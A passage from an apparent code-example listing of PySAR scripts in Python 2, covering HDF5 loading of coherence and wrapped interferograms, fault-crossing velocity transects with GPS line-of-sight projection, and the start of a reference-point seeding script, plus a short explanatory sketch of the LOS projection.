    if os.path.isfile(tssarProjectDir+'/Coherence.h5'):
      print '\nCoherence.h5'+ '  already exists.'
      sys.exit(1)
    corList = glob.glob(corPath)
    k = 'coherence'
    check_number(k,corList)   # number check 
    print 'loading coherence files ...'
    corList,mode_width,mode_length = check_size(k,corList)     # size check

    h5file = tssarProjectDir+'/Coherence.h5'
    fcor = h5py.File(h5file)
    gg = fcor.create_group('coherence')
    meanCoherence=np.zeros([int(mode_length),int(mode_width)])
    for cor in corList:
      if not os.path.basename(cor) in fcor:
        print 'Adding ' + cor
        group = gg.create_group(os.path.basename(cor))
        amp,unw,unwrsc = readfile.read_float32(cor)

        meanCoherence=meanCoherence+unw
        dset = group.create_dataset(os.path.basename(cor), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
           group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(cor)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
           group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(cor)
    #fcor.close()

    ########### mean coherence file ###############
    meanCoherence=meanCoherence/(len(corList))
    print 'writing meanCoherence group to the coherence h5 file'
    gc = fcor.create_group('meanCoherence')
    dset = gc.create_dataset('meanCoherence', data=meanCoherence, compression='gzip')

    print 'writing average_spatial_coherence.h5\n'
    h5file_CorMean = tssarProjectDir+'/average_spatial_coherence.h5'
    fcor_mean = h5py.File(h5file_CorMean,'w')
    group=fcor_mean.create_group('mask')
    dset = group.create_dataset(os.path.basename('mask'), data=meanCoherence, compression='gzip')
    for key,value in unwrsc.iteritems():
       group.attrs[key] = value
    fcor_mean.close()

    fcor.close()

  except:
    print 'No correlation file is loaded.\n'


##############################################################################
########################## Wrapped Interferograms ############################

  try:
    if os.path.isfile(tssarProjectDir+'/Wrapped.h5'):
      print '\nWrapped.h5'+ '  already exists.'
      sys.exit(1)
    wrapList = glob.glob(wrapPath)
    k = 'wrapped'
    check_number(k,wrapList)   # number check 
    print 'loading wrapped phase ...'
    wrapList,mode_width,mode_length = check_size(k,wrapList)     # size check

    h5file = tssarProjectDir+'/Wrapped.h5'
    fw = h5py.File(h5file)
    gg = fw.create_group('wrapped')
    for wrap in wrapList:
      if not os.path.basename(wrap) in fw:
        print 'Adding ' + wrap
        group = gg.create_group(os.path.basename(wrap))
        amp,unw,unwrsc = readfile.read_complex64(wrap)

        dset = group.create_dataset(os.path.basename(wrap), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
           group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(wrap)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
           group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(wrap)
    fw.close()
    print 'Wrote '+str(len(wrapList))+' wrapped interferograms to '+h5file+'\n'
  except:
    print 'No wrapped interferogram is loaded.\n'


##############################################################################
################################# geomap.trans ###############################

  try:
    geomapPath = tssarProjectDir+'/geomap*.trans'
    geomapList = glob.glob(geomapPath)
    if len(geomapList)>0:
      print '\ngeomap*.trans'+ '  already exists.'
      sys.exit(1)

    geomapPath=templateContents['pysar.geomap']
    geomapPath=check_variable_name(geomapPath)
    geomapList=glob.glob(geomapPath)

    cpCmd="cp " + geomapList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + geomapList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no geomap file is loaded.\n"
    #print "*********************************\n"


##############################################################################
##################################  DEM  #####################################

  try:
    demRdrPath = tssarProjectDir+'/radar*.hgt'
    demRdrList = glob.glob(demRdrPath)
    if len(demRdrList)>0:
      print '\nradar*.hgt'+ '  already exists.'
      sys.exit(1)

    demRdrPath=templateContents['pysar.dem.radarCoord']
    demRdrPath=check_variable_name(demRdrPath)
    demRdrList=glob.glob(demRdrPath)

    cpCmd="cp " + demRdrList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + demRdrList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no DEM (radar coordinate) file is loaded.\n"
    #print "*********************************"

  try:
    demGeoPath = tssarProjectDir+'/*.dem'
    demGeoList = glob.glob(demGeoPath)
    if len(demGeoList)>0:
      print '\n*.dem'+ '  already exists.'
      sys.exit(1)

    demGeoPath=templateContents['pysar.dem.geoCoord']
    demGeoPath=check_variable_name(demGeoPath)
    demGeoList=glob.glob(demGeoPath)

    cpCmd="cp " + demGeoList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + demGeoList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no DEM (geo coordinate) file is loaded.\n"

Example 47

Project: PySAR
Source File: multi_transect.py
View license
def main(argv):
  ntrans=1
  save_to_mat='off'
  flip_profile='no'
  which_gps = 'all'
  flip_updown = 'yes'
  incidence_file='incidence_file'
  display_InSAR='on'
  display_Average='on'
  display_Standard_deviation='on'

  try:
       opts, args = getopt.getopt(argv,"f:s:e:n:d:g:l:h:r:L:F:p:u:G:S:i:I:A:U:E:D:W:x:X:")

  except getopt.GetoptError:
       Usage() ; sys.exit(1)

  for opt,arg in opts:
      if opt == '-f':
        velocityFile = arg
      elif opt == '-s':
        pnt1 = arg.split(',')
        y0=int(pnt1[0])
        x0=int(pnt1[1])
      elif opt == '-e':
        pnt2 = arg.split(',')
        y1=int(pnt2[0])
        x1=int(pnt2[1])
      elif opt == '-n':
        ntrans = int(arg)
      elif opt == '-d':
        dp = float(arg)
      elif opt == '-g':
        gpsFile=arg
      elif opt == '-r':
        refStation=arg
      elif opt == '-i':
        incidence_file=arg
      elif opt == '-L':
        stationsList = arg.split(',')
      elif opt == '-F':
        Fault_coord_file=arg
      elif opt == '-p':
        flip_profile=arg
      elif opt == '-u':
        flip_updown=arg
        print flip_updown
      elif opt == '-G':
        which_gps=arg
      elif opt == '-S':
        gps_source=arg
      elif opt == '-l':
        lbound=float(arg)
      elif opt == '-I':
        display_InSAR=arg
      elif opt == '-A':
        display_Average=arg
      elif opt == '-U':
        display_Standard_deviation=arg
      elif opt == '-E':
        save_to_mat=arg
      elif opt == '-h':
        hbound=float(arg)
      elif opt == '-D':
        Dp=float(arg)
      elif opt == '-W':
        profile_Length=float(arg)
      elif opt == '-x':
        x_lbound=float(arg) 
      elif opt == '-X':
        x_hbound=float(arg)

  try:    
       h5file=h5py.File(velocityFile,'r')
  except:
       Usage()
       sys.exit(1)
    
  k=h5file.keys()
  dset= h5file[k[0]].get(k[0])
  z=dset[0:dset.shape[0],0:dset.shape[1]]
  dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
  dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0

#############################################################################

  try:
      lat,lon,lat_step,lon_step,lat_all,lon_all = get_lat_lon(h5file)
  except:
      print 'radar coordinate'

  Fault_lon,Fault_lat=read_fault_coords(Fault_coord_file,Dp)


 # Fault_lon=[66.40968453947265,66.36000186563085,66.31103920134248]
 # Fault_lat=[30.59405079532564,30.51565960186412,30.43928430936202]

  Num_profiles=len(Fault_lon)-1
  print '*********************************************'
  print '*********************************************'
  print 'Number of profiles to be generated: '+str(Num_profiles)
  print '*********************************************'
  print '*********************************************'

  for Np in range(Num_profiles):
    FaultCoords=[Fault_lat[Np],Fault_lon[Np],Fault_lat[Np+1],Fault_lon[Np+1]] 
    print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
    print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
    print ''
    print 'Profile '+str(Np) + ' [of total '+str(Num_profiles)+']'
    print ''
    
    try:
    #  Lat0 = dms2d(FaultCoords[0]); Lon0 = dms2d(FaultCoords[1])
    #  Lat1 = dms2d(FaultCoords[2]); Lon1 = dms2d(FaultCoords[3])

      Lat0 = FaultCoords[0]; Lon0 = FaultCoords[1]
      Lat1 = FaultCoords[2]; Lon1 = FaultCoords[3]
      Length,Width=np.shape(z)
      Yf0,Xf0=find_row_column(Lon0,Lat0,lon,lat,lon_step,lat_step)
      Yf1,Xf1=find_row_column(Lon1,Lat1,lon,lat,lon_step,lat_step)

      print '*********************************************'
      print ' Fault Coordinates:'
      print '   --------------------------  '
      print '    Lat          Lon'
      print str(Lat0) + ' , ' +str(Lon0)
      print str(Lat1) + ' , ' +str(Lon1)
      print '   --------------------------  '
      print '    row          column'
      print str(Yf0) + ' , ' +str(Xf0)
      print str(Yf1) + ' , ' +str(Xf1)
      print '*********************************************'
#      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
#      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
#      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
#      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

#      mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
#      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
#      y1=int(mp*(x1-x0)+y0)


    except:
      print '*********************************************'
      print 'No information about the Fault coordinates!'
      print '*********************************************'

#############################################################################
    y0,x0,y1,x1 = get_start_end_point(Xf0,Yf0,Xf1,Yf1,profile_Length,dx,dy)

    try:
      x0;y0;x1;y1
    except:
      fig = plt.figure()
      ax=fig.add_subplot(111)
      ax.imshow(z)
      try:
        ax.plot([Xf0,Xf1],[Yf0,Yf1],'k-')
      except:
        print 'Fault line is not specified'

      xc=[]
      yc=[]
      print 'please click on start and end point of the desired profile'
      def onclick(event):
        if event.button==1:
          print 'click'
          xc.append(int(event.xdata))
          yc.append(int(event.ydata))
      cid = fig.canvas.mpl_connect('button_press_event', onclick)
      plt.show()
      x0=xc[0];x1=xc[1]
      y0=yc[0];y1=yc[1]
##############################################################################
   # try:
   #   mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
   #   cf=float(Yf0-mf*Xf0)   # intercept of the fault line
   #   df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
   #   df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

   #   mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
   #   x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
   #   y1=int(mp*(x1-x0)+y0)
   # except:
   #   Info_aboutFault='No'

##############################################################################
    print '******************************************************'
    print 'First profile coordinates:'
    print 'Start point:  y = '+str(y0) +',x = '+ str(x0) 
    print 'End point:   y = '+ str(y1) + '  , x = '+str(x1)   
    print '' 
    print str(y0) +','+ str(x0)
    print str(y1) +','+ str(x1)
    print '******************************************************'
    length = int(np.hypot(x1-x0, y1-y0))
    x, y = np.linspace(x0, x1, length), np.linspace(y0, y1, length)
    zi = z[y.astype(np.int), x.astype(np.int)]
    try:
      lat_transect=lat_all[y.astype(np.int), x.astype(np.int)]
      lon_transect=lon_all[y.astype(np.int), x.astype(np.int)] 
    except:
      lat_transect='Nan'
      lon_transect='Nan'
  #  print '$$$$$$$$$$$$$$$'
  #  print lat_transect
  #  print lat_all.shape
  #  print '$$$$$$$$$$$$$$$'

   # zi=get_transect(z,x0,y0,x1,y1)
 
    try:
       dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
       dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'geo coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'
     #  df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       dx=float(h5file[k[0]].attrs['RANGE_PIXEL_SIZE'])
       dy=float(h5file[k[0]].attrs['AZIMUTH_PIXEL_SIZE'])
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'radar coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'       
    #   df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)

    try:
       mf,cf=line(Xf0,Yf0,Xf1,Yf1)
       df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       print 'Fault line is not specified'


    transect=np.zeros([len(D),ntrans])    
    transect[:,0]=zi
    XX0=[];XX1=[]
    YY0=[];YY1=[]
    XX0.append(x0);XX1.append(x1)
    YY0.append(y0);YY1.append(y1)

    if ntrans >1:
      
       m=float(y1-y0)/float((x1-x0))
       c=float(y0-m*x0)       
       m1=-1.0/m
       try:
         dp
       except:
         dp=1.0
       if lat_transect=='Nan':
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0  
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)         
           transect[:,i]=zi
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       else:
         transect_lat=np.zeros([len(D),ntrans])
         transect_lat[:,0]=lat_transect
         transect_lon=np.zeros([len(D),ntrans])
         transect_lon[:,0]=lon_transect
 
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)
           lat_transect=get_transect(lat_all,X0,Y0,X1,Y1)
           lon_transect=get_transect(lon_all,X0,Y0,X1,Y1)       
           transect[:,i]=zi
           transect_lat[:,i]=lat_transect
           transect_lon[:,i]=lon_transect
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       
   # print np.shape(XX0)
   # print np.shape(XX1)
   # print np.shape(YY0) 
   # print np.shape(YY1)


#############################################
    try:
        m_prof_edge,c_prof_edge=line(XX0[0],YY0[0],XX0[-1],YY0[-1])    
    except:
        print 'Plotting one profile'    
###############################################################################    
    if flip_profile=='yes':
       transect=np.flipud(transect)
       try:
         df0_km=np.max(D)-df0_km
       except:
         print ''
    

    print '******************************************************'
    try:
       gpsFile
    except:
       gpsFile='Nogps'
    print 'GPS velocity file:'
    print gpsFile
    print '*******************************************************'
    if os.path.isfile(gpsFile):
       insarData=z
       del z
       fileName, fileExtension = os.path.splitext(gpsFile)
    #   print fileExtension
     #  if fileExtension =='.cmm4':
     #      print 'reading cmm4 velocities'
     #      Stations, gpsData = redGPSfile_cmm4(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lon,Lat,Ve,Vn,Se,Sn,Corr,Hrate,H12=gpsData[idxRef,:]
     #      Lon=Lon-360.0
          # Lat,Lon,Ve,Se,Vn,Sn,Corr,NumEpochs,timeSpan,AvgEpochTimes = gpsData[idxRef,:]
     #      Vu=0
     #  else:
     #      Stations, gpsData = redGPSfile(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
      
       Stations,Lat,Lon,Ve,Se,Vn,Sn=readGPSfile(gpsFile,gps_source)
       idxRef=Stations.index(refStation)
       Length,Width=np.shape(insarData)
       lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
       IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)
       if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
         print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)
         if not np.isnan(insarData[IDYref][IDXref]):
             transect = transect - insarData[IDYref][IDXref]
             insarData=insarData - insarData[IDYref][IDXref]
            
         else:
            
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: nan value for InSAR data at the reference pixel!
               reference station should be a pixel with valid value in InSAR data.
                               
               please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
       else:
         print 'WARNING:'
         print 'Reference GPS station is out of the area covered by InSAR data'
         print 'please select another GPS station as the reference station.'
         sys.exit(1)
       
       try:
         stationsList
       except:
         stationsList = Stations

        
      # theta=23.0*np.pi/180.0
       if os.path.isfile(incidence_file):
           print 'Using exact look angle for each pixel'
           h5file_theta=h5py.File(incidence_file,'r')
           dset=h5file_theta['mask'].get('mask')
           theta=dset[0:dset.shape[0],0:dset.shape[1]]
           theta=theta*np.pi/180.0
       else:
           print 'Using average look angle'
           theta=np.ones(np.shape(insarData))*23.0*np.pi/180.0

       heading=193.0*np.pi/180.0
       
     #  unitVec=[-np.sin(theta)*np.sin(heading),-np.cos(heading)*np.sin(theta),-np.cos(theta)]
       unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]#-np.cos(theta)]
       
      #  [0.0806152480932643, 0.34918300221540616, -0.93358042649720174]
       # print unitVec 
       # unitVec=[0.3,-0.09,0.9]
      # unitVec=[-0.3,0.09,-0.9]
      # unitVec=[-0.3,0.09,0]

      # print '*******************************************'
      # print 'unit vector to project GPS to InSAR LOS:'
      # print unitVec
      # print '*******************************************'
      # gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]#+unitVec[2]*Vu[idxRef]       

#       print np.shape(theta)
#       print IDYref
#       print IDXref
#       print theta[IDYref,IDXref]

       gpsLOS_ref = gps_to_LOS(Ve[idxRef],Vn[idxRef],theta[IDYref,IDXref],heading)
       print '%%%%%%^^^^^^^%%%%%%%%'
       print gpsLOS_ref/1000.0
      # insarData=insarData -gpsLOS_ref/1000.0 
      # transect = transect -gpsLOS_ref/1000.0

       GPS=[]
       GPS_station=[]
       GPSx=[]
       GPSy=[]
       GPS_lat=[]
       GPS_lon=[]
       for st in stationsList:
         try :
           idx=Stations.index(st)
          
          # gpsLOS = unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]#+unitVec[2]*Vu[idx]
            
         #  gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[idx],heading)
         #  gpsLOS=gpsLOS-gpsLOS_ref

           IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
           print theta[IDY,IDX]
           gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[IDY,IDX],heading)
         #  gpsLOS = gpsLOS-gpsLOS_ref

           if which_gps =='all':
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])   
           elif not np.isnan(insarData[IDY][IDX]):
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])
         except:
           NoInSAR='yes'   
       
      # print GPS_station
      # print gpsLOS 
       DistGPS=[]
       GPS_in_bound=[]
       GPS_in_bound_st=[] 
       GPSxx=[]
       GPSyy=[]
       for i in range(len(GPS_station)):
         gx=GPSx[i]
         gy=GPSy[i]
 #        print '******************'
      #   print gx
      #   print gy
         if which_gps in ['all','insar']:
             check_result = 'True'
         else:
             check_result=check_st_in_box(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)

         if check_result=='True':
           check_result2=check_st_in_box2(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)
           GPS_in_bound_st.append(GPS_station[i])
           GPS_in_bound.append(GPS[i])
           GPSxx.append(GPSx[i])
           GPSyy.append(GPSy[i])   
          # gy=y0+1
          # gx=x0+1
          # gxp,gyp=get_intersect(m,c,gx,gy)
          # Dx=dx*(gx-gxp);Dy=dy*(gy-gyp)
          # print gxp
          # print gyp
           dg = dist_point_from_line(m,c,gx,gy,1,1) # distance of GPS station from the first profile line
          # DistGPS.append(np.hypot(Dx,Dy))
          # X0=dg/np.sqrt(1+m1**2)+x0
          # Y0=m1*(X0-x0)+y0
          # DistGPS.append(np.hypot(dx*(gx-X0), dy*(gy-Y0)))
          
           DistGPS.append(dist_point_from_line(m_prof_edge,c_prof_edge,GPSx[i],GPSy[i],dx,dy))
           

       print '****************************************************'
       print 'GPS stations in the profile area:' 
       print GPS_in_bound_st
       print '****************************************************'
       GPS_in_bound = np.array(GPS_in_bound)
       DistGPS = np.array(DistGPS)
   #    axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'bo')

    if gpsFile=='Nogps':

        insarData=z
        GPSxx=[]
        GPSyy=[]
        GPSx=[];GPSy=[]
        GPS=[]
        XX0[0]=x0;XX1[0]=x1;YY0[0]=y0;YY1[0]=y1

   # else:

    print '****************'
    print 'flip up-down'
    print flip_updown

    if flip_updown=='yes' and gpsFile!='Nogps':
       print 'Flipping up-down'
       transect=-1*transect
       GPS_in_bound=-1*GPS_in_bound
    elif flip_updown=='yes':
       print 'Flipping up-down'
       transect=-1*transect


    if flip_profile=='yes' and gpsFile!='Nogps':
       
       GPS=np.flipud(GPS)
       GPS_in_bound=np.flipud(GPS_in_bound)
       DistGPS=np.flipud(max(D)-DistGPS)


    fig, axes = plt.subplots(nrows=2)
    axes[0].imshow(insarData)
    for i in range(ntrans):
        axes[0].plot([XX0[i], XX1[i]], [YY0[i], YY1[i]], 'r-')

    axes[0].plot(GPSx,GPSy,'b^')
    axes[0].plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes[0].plot(IDXref,IDYref,'r^')       
    axes[0].axis('image')
    axes[1].plot(D/1000.0,transect,'ko',ms=1)

    avgInSAR=np.array(nanmean(transect,axis=1))
    stdInSAR=np.array(nanstd(transect,axis=1))
  #  print avgInSAR
  #  print stdInSAR
    
      #std=np.std(transect,1)
   # axes[1].plot(D/1000.0, avgInSAR, 'r-')
    try:
      axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'b^',ms=10)
    except:
      print ''
   # pl.fill_between(x, y-error, y+error,alpha=0.6, facecolor='0.20')
   # print transect
#############################################################################

    fig2, axes2 = plt.subplots(nrows=1)
    axes2.imshow(insarData)
    #for i in range(ntrans):
    axes2.plot([XX0[0], XX1[0]], [YY0[0], YY1[0]], 'k-')
    axes2.plot([XX0[-1], XX1[-1]], [YY0[-1], YY1[-1]], 'k-')
    axes2.plot([XX0[0], XX0[-1]], [YY0[0], YY0[-1]], 'k-')
    axes2.plot([XX1[0], XX1[-1]], [YY1[0], YY1[-1]], 'k-')

    try:
       axes2.plot([Xf0,Xf1],[Yf0,Yf1], 'k-')
    except:
       FaultLine='None'
    

    axes2.plot(GPSx,GPSy,'b^')
    axes2.plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes2.plot(IDXref,IDYref,'r^')
    axes2.axis('image')

    figName = 'transect_area_'+str(Np)+'.png'
    print 'writing '+figName
    plt.savefig(figName)    

#############################################################################
    fig = plt.figure()
    fig.set_size_inches(10,4)
    ax = plt.Axes(fig, [0., 0., 1., 1.], )
    ax=fig.add_subplot(111)
    if display_InSAR in ['on','On','ON']:
       ax.plot(D/1000.0,transect*1000,'o',ms=1,mfc='Black', linewidth='0')


############################################################################
# save the profile data:     
    if save_to_mat in ['ON','on','On']:
       import scipy.io as sio
       matFile='transect'+str(Np)+'.mat'
       dataset={}
       dataset['datavec']=transect
       try:
         dataset['lat']=transect_lat
         dataset['lon']=transect_lon
       except:
         dataset['lat']='Nan'
         dataset['lon']='Nan'
       dataset['Unit']='m'
       dataset['Distance_along_profile']=D
       print '*****************************************'
       print ''
       print 'writing transect to >>> '+matFile
       sio.savemat(matFile, {'dataset': dataset})
       print ''
       print '*****************************************'
############################################################################
 #   ax.plot(D/1000.0, avgInSAR*1000, 'r-')
 
#    ax.plot(D/1000.0,transect*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)),'o',ms=1,mfc='Black', linewidth='0')
#    ax.plot(D/1000.0, avgInSAR*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)), 'r-')

#############################################################################
    if display_Standard_deviation in ['on','On','ON']:
 
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR-i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#,color='#DCDCDC')#'LightGrey')
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR+i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#'LightGrey')
#############################################################################
    if display_Average in ['on','On','ON']:
       ax.plot(D/1000.0, avgInSAR*1000, 'r-')
########### 
  # ax.fill_between(D/1000.0, (avgInSAR-stdInSAR)*1000, (avgInSAR+stdInSAR)*1000,where=(avgInSAR+stdInSAR)*1000>=(avgInSAR-stdInSAR)*1000,alpha=1, facecolor='Red')

    try:      
        ax.plot(DistGPS/1000.0, -1*GPS_in_bound, '^',ms=10,mfc='Cyan')
    except:
        print ''
    ax.set_ylabel('LOS velocity [mm/yr]',fontsize=26)
    ax.set_xlabel('Distance along profile [km]',fontsize=26)


   # print '******************'
   # print 'Dsitance of fault from the beginig of profile(km):'
   # print df0_km/1000.0


    ###################################################################
    # lower and upper bounds for displaying the profile

    try:
       lbound
       hbound
    except:
       lbound=np.nanmin(transect)*1000
       hbound=np.nanmax(transect)*1000

    ###################################################################
    #To plot the Fault location on the profile
  #  try:
    ax.plot([df0_km/1000.0,df0_km/1000.0], [lbound,hbound], '--',color='black',linewidth='2')
  #  except:
  #     fault_loc='None'

    ###################################################################
    

    try: 
         ax.set_ylim(lbound,hbound)
    except:
         ylim='no'

    try: 
         ax.set_xlim(x_lbound,x_hbound)
    except:
         xlim='no'


##########
#Temporary To plot DEM
   # try:
#    majorLocator = MultipleLocator(5)
#    ax.yaxis.set_major_locator(majorLocator)
#    minorLocator   = MultipleLocator(1)
#    ax.yaxis.set_minor_locator(minorLocator)

#    plt.tick_params(which='major', length=15,width=2)
#    plt.tick_params(which='minor', length=6,width=2)

#    try:
#       for tick in ax.xaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#       for tick in ax.yaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#    
#       plt.tick_params(which='major', length=15,width=2)
#       plt.tick_params(which='minor', length=6,width=2)
#    except:
#       print 'couldn not fix the ticks! '


    figName = 'transect_'+str(Np)+'.png'
    print 'writing '+figName
    plt.savefig(figName)
    print ''
    print '________________________________'
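
Both this script and the one in Example 45 project GPS east/north/up velocities onto the radar line of sight with a unit vector of the form [cos(heading)*sin(theta), -sin(heading)*sin(theta), -cos(theta)] (the vertical term is dropped when only the horizontal components are wanted), and propagate the per-component sigmas the same way. The sketch below is a standalone illustration of that dot product and error propagation; the function names and sample numbers are illustrative, not part of PySAR's API.

import numpy as np

def los_unit_vector(theta_deg, heading_deg):
    """Unit vector used above: [cos(h)*sin(t), -sin(h)*sin(t), -cos(t)]."""
    t = np.radians(theta_deg)
    h = np.radians(heading_deg)
    return np.array([np.cos(h) * np.sin(t), -np.sin(h) * np.sin(t), -np.cos(t)])

def project_to_los(ve, vn, vu, theta_deg, heading_deg):
    """Project an east/north/up velocity onto the radar line of sight."""
    return np.dot(los_unit_vector(theta_deg, heading_deg), [ve, vn, vu])

def los_sigma(se, sn, su, theta_deg, heading_deg):
    """1-sigma LOS uncertainty, assuming independent E/N/U errors."""
    u = los_unit_vector(theta_deg, heading_deg)
    return np.sqrt(np.sum((u * np.array([se, sn, su])) ** 2))

if __name__ == '__main__':
    # Hypothetical values: 23 deg incidence, 193 deg heading, velocities in mm/yr.
    print(project_to_los(5.0, -3.0, 1.0, 23.0, 193.0))
    print(los_sigma(0.5, 0.5, 1.0, 23.0, 193.0))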

Example 48

Project: PySAR
Source File: seed_data.py
View license
def main(argv):
  method = 'auto'
  maskFile = 'Mask.h5'
  try:
      opts, args = getopt.getopt(argv,"h:f:m:y:x:l:L:s:")

  except getopt.GetoptError:
      Usage() ; sys.exit(1)

  for opt,arg in opts:
      if opt in ("-h","--help"):
        Usage()
        sys.exit()
      elif opt == '-f':
        file = arg
      elif opt == '-m':
        method = arg
      elif opt == '-y':
        y = int(arg)
      elif opt == '-x':
        x = int(arg)
      elif opt == '-l':
        latr = float(arg)
      elif opt == '-L':
        lonr = float(arg)
      elif opt == '-s':
        maskFile = arg

  try:
     file
  except:
     Usage() ; sys.exit(1)

#  if os.path.isfile('Seeded_'+file):
#      print ''
#      print 'Seeded_'+file+ '  already exists.'
#      print ''
#      sys.exit(1)

################################ 
  h5file = h5py.File(file)
  k=h5file.keys()

  try:
     print 'Finding the row and column number for the lat/lon'
     y,x=find_row_column(lonr,latr,h5file)
     print 'The y and x found for lat lon : ' +str(y) + ' , ' + str(x)
     
  except:
    print 'Skipping lat/lon reference point.'
    print 'Continue with the y/x reference point.' 


  if 'interferograms' in k:
   Mset = h5file['mask'].get('mask')
   M = Mset[0:Mset.shape[0],0:Mset.shape[1]]
   try:
    x
    y
  
  #  h5file = h5py.File(file)
